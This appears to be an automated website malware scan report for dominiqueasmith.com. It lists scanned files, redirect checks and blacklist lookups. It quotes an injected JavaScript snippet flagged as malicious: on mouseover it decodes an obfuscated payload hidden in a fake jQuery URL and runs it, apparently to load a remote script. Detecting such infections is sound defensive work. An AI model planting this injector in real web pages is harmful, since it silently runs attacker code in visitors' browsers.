Scanned pages/files
| Request | Server response | Status |
http://dominiqueasmith.com/ | 200 OK Content-Length: 29285 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://dominiqueasmith.com/delete_me/js/prototype.lite.js | 200 OK Content-Length: 3237 Content-Type: application/javascript | clean |
http://dominiqueasmith.com/delete_me/js/moo.fx.js | 200 OK Content-Length: 3267 Content-Type: application/javascript | clean |
http://dominiqueasmith.com/delete_me/js/moo.fx.pack.js | 200 OK Content-Length: 6325 Content-Type: application/javascript | clean |
https://support.hostica.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 10:54:14 GMT Location: https://www.hostica.com/support/Tickets/Submit Server: nginx Content-Length: 178 Content-Type: text/html | clean |
https://www.hostica.com/support/tickets/submit | 200 OK Content-Length: 12102 Content-Type: text/html | clean |
https://www.hostica.com/support/Core/Default/Compressor/js | 200 OK Content-Length: 302542 Content-Type: text/javascript | clean |
http://support.hostica.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 27 Feb 2015 10:54:19 GMT Location: https://www.hostica.com/support/Tickets/Submit Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://www.hostica.com/test404page.js | 404 Not Found Content-Length: 537 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dominiqueasmith.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 10:54:42 GMT
Accept-Ranges: bytes
ETag: "20804fa-7265-4b022f3881100"
Server: Apache
Content-Length: 29285
Content-Type: text/html
Last-Modified: Tue, 25 Oct 2011 17:34:28 GMT
...29285 bytes of data.
GET / HTTP/1.1
Host: dominiqueasmith.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 10:54:42 GMT
Accept-Ranges: bytes
ETag: "20804fa-7265-4b022f3881100"
Server: Apache
Content-Length: 29285
Content-Type: text/html
Last-Modified: Tue, 25 Oct 2011 17:34:28 GMT
...29285 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dominiqueasmith.com
Referer: http://www.google.com/search?q=dominiqueasmith.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dominiqueasmith.com
Referer: http://www.google.com/search?q=dominiqueasmith.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dominiqueasmith.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dominiqueasmith.com/
Result: dominiqueasmith.com is not infected or malware details are not published yet.
Result: dominiqueasmith.com is not infected or malware details are not published yet.